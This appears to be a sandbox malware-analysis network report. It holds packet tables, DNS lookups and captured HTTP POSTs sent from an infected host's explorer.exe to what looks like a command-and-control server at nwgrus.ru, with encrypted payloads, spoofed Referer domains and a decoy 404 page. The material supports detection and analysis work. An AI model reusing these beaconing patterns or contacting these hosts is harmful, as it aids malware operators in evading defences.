Sep 25, 2024 16:02:29.743544102 CEST  443    49750  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.743683100 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.758856058 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.758876085 CEST  443    49750  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.759176970 CEST  443    49750  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.775311947 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.775365114 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.775373936 CEST  443    49750  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:30.053045034 CEST  443    49750  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:30.053215981 CEST  443    49750  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:30.053327084 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:30.053379059 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:30.053395987 CEST  443    49750  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:30.053407907 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:30.053414106 CEST  443    49750  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:35.727170944 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:35.727224112 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:35.727308035 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:35.728835106 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:35.728849888 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:36.319010019 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:36.319150925 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:36.331684113 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:36.331703901 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:36.331968069 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:36.401674032 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:36.401695967 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:36.401710987 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:36.940810919 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:36.940893888 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:36.941148996 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:36.943069935 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:36.943069935 CEST  49751  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:36.943103075 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:36.943113089 CEST  443    49751  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:19.966249943 CEST  49752  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:19.971338987 CEST  80     49752  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:19.973128080 CEST  49752  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:19.973284960 CEST  49752  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:19.973320007 CEST  49752  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:19.978144884 CEST  80     49752  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:19.978230953 CEST  80     49752  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:21.252602100 CEST  80     49752  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:21.252645016 CEST  80     49752  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:21.252703905 CEST  49752  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:21.252877951 CEST  49752  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:21.257838011 CEST  80     49752  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:30.179510117 CEST  49753  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:30.184842110 CEST  80     49753  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:30.184940100 CEST  49753  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:30.185046911 CEST  49753  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:30.185086966 CEST  49753  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:30.189944029 CEST  80     49753  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:30.189989090 CEST  80     49753  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:31.755563974 CEST  80     49753  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:31.755662918 CEST  80     49753  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:31.755722046 CEST  49753  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:31.755938053 CEST  49753  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:31.760664940 CEST  80     49753  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:43.804769039 CEST  49754  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:43.809752941 CEST  80     49754  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:43.809842110 CEST  49754  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:43.811299086 CEST  49754  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:43.811331987 CEST  49754  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:43.816241026 CEST  80     49754  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:43.816323996 CEST  80     49754  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:45.252703905 CEST  80     49754  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:45.252733946 CEST  80     49754  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:45.252748966 CEST  80     49754  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:45.252830982 CEST  49754  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:45.265652895 CEST  49754  80     192.168.2.5    116.58.10.60
Sep 25, 2024 16:03:45.270638943 CEST  80     49754  116.58.10.60   192.168.2.5
Sep 25, 2024 16:03:52.543411016 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:52.543462038 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:52.543535948 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:52.543936014 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:52.543947935 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:53.142972946 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:53.143085957 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:53.144599915 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:53.144613028 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:53.144861937 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:53.184146881 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:53.184170961 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:53.184256077 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:53.528382063 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:53.528583050 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:53.528759003 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:53.559597969 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:53.559650898 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:03:53.559767008 CEST  49755  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:03:53.559775114 CEST  443    49755  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:03.026755095 CEST  49756  80     192.168.2.5    190.98.23.157
Sep 25, 2024 16:04:03.031595945 CEST  80     49756  190.98.23.157  192.168.2.5
Sep 25, 2024 16:04:03.031698942 CEST  49756  80     192.168.2.5    190.98.23.157
Sep 25, 2024 16:04:03.031873941 CEST  49756  80     192.168.2.5    190.98.23.157
Sep 25, 2024 16:04:03.031912088 CEST  49756  80     192.168.2.5    190.98.23.157
Sep 25, 2024 16:04:03.036664963 CEST  80     49756  190.98.23.157  192.168.2.5
Sep 25, 2024 16:04:03.036815882 CEST  80     49756  190.98.23.157  192.168.2.5
Sep 25, 2024 16:04:04.581497908 CEST  80     49756  190.98.23.157  192.168.2.5
Sep 25, 2024 16:04:04.584372044 CEST  80     49756  190.98.23.157  192.168.2.5
Sep 25, 2024 16:04:04.585526943 CEST  49756  80     192.168.2.5    190.98.23.157
Sep 25, 2024 16:04:04.585560083 CEST  49756  80     192.168.2.5    190.98.23.157
Sep 25, 2024 16:04:04.590509892 CEST  80     49756  190.98.23.157  192.168.2.5
Sep 25, 2024 16:04:13.159389019 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:13.159427881 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:13.159513950 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:13.159879923 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:13.159889936 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:13.853146076 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:13.853313923 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:13.854669094 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:13.854677916 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:13.854923010 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:13.856147051 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:13.856179953 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:13.856211901 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:14.335510015 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:14.335612059 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:14.335686922 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:14.335922956 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:14.335939884 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:14.335958958 CEST  49757  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:04:14.335963964 CEST  443    49757  23.145.40.162  192.168.2.5
Sep 25, 2024 16:04:25.658009052 CEST  49758  80     192.168.2.5    190.98.23.157
                                                                      Sep 25, 2024 16:04:25.663450003 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:25.663579941 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:25.663769960 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:25.663795948 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:25.669086933 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:25.669507980 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:26.955331087 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:26.957564116 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:26.957735062 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:26.957901001 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:26.962722063 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:36.165013075 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.165071964 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.165149927 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.165580988 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.165594101 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.768271923 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.768429995 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.811116934 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.811144114 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.811431885 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.813628912 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.813661098 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.813687086 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:37.140070915 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:37.140485048 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:37.140558958 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:37.151051044 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:37.151076078 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:37.151089907 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:37.151098013 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:48.742728949 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:48.749726057 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:48.749828100 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:48.750010014 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:48.750046015 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:48.756885052 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:48.759119987 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:50.037108898 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:50.039180994 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:50.039241076 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:50.039287090 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:50.044171095 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:58.526947975 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:58.527015924 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:58.527113914 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:58.527661085 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:58.527679920 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.134339094 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.134445906 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.135802984 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.135827065 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.136086941 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.136890888 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.136917114 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.136965036 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.516201973 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.516283035 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.516355991 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.516544104 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.516570091 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.516587019 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.516597033 CEST4434976123.145.40.162192.168.2.5
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Sep 25, 2024 16:01:27.300789118 CEST  192.168.2.5  1.1.1.1  0x6f8a    Standard query (0)  nwgrus.ru           A (IP address)  IN (0x0001)  false
Sep 25, 2024 16:01:28.308608055 CEST  192.168.2.5  1.1.1.1  0x6f8a    Standard query (0)  nwgrus.ru           A (IP address)  IN (0x0001)  false
Sep 25, 2024 16:01:29.324637890 CEST  192.168.2.5  1.1.1.1  0x6f8a    Standard query (0)  nwgrus.ru           A (IP address)  IN (0x0001)  false
Sep 25, 2024 16:02:19.508761883 CEST  192.168.2.5  1.1.1.1  0x2718    Standard query (0)  calvinandhalls.com  A (IP address)  IN (0x0001)  false
Sep 25, 2024 16:04:02.849618912 CEST  192.168.2.5  1.1.1.1  0x68c5    Standard query (0)  nwgrus.ru           A (IP address)  IN (0x0001)  false
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.5  49711        116.58.10.60    80                1028  C:\Windows\explorer.exe

Timestamp: Sep 25, 2024 16:01:29.713839054 CEST  Bytes transferred: 283  Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bdxvqfpjlsvhpaof.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 121
Host: nwgrus.ru

Timestamp: Sep 25, 2024 16:01:29.713872910 CEST  Bytes transferred: 121  Direction: OUT
Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 40 ca fe
Timestamp: Sep 25, 2024 16:01:30.964297056 CEST  Bytes transferred: 152  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Wed, 25 Sep 2024 14:01:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Raw: 04 00 00 00 72 e8 86 ea


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49712        116.58.10.60    80                1028  C:\Windows\explorer.exe

Timestamp: Sep 25, 2024 16:01:30.973973989 CEST  Bytes transferred: 283  Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://uotbaartbcqldrdx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 328
Host: nwgrus.ru

Timestamp: Sep 25, 2024 16:01:30.973973989 CEST  Bytes transferred: 328  Direction: OUT
Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 55 1d bd ac
Timestamp: Sep 25, 2024 16:01:32.199060917 CEST  Bytes transferred: 484  Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Wed, 25 Sep 2024 14:01:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49713 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:32.214114904 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://kdulrgfaviysx.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 141
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:32.214138985 CEST | 141 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 27 0e c4 ff
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu'R\s_F*;\W{4"582;?
Sep 25, 2024 16:01:33.463205099 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:33 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49714 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:33.477191925 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jlkucuylyof.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 278
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:33.477210045 CEST | 278 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 62 4b cc a2
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vubKGbUy5ayibsBZP#*x!K|(L|{<?c 5AB>XbvZv*BFdPKC!
Sep 25, 2024 16:01:34.746088982 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:34 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49715 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:34.754909039 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ejvnhlvhpussik.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 368
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:34.754909039 CEST | 368 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 5f 58 d5 af
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu_XDVa~{kwPN94aBVfCT9'R)UvC32{!OOm9_-$}-|1a>;dykQZb\(">X
Sep 25, 2024 16:01:36.015013933 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:35 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49716 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:36.023788929 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://vsagqcxnudryn.com/
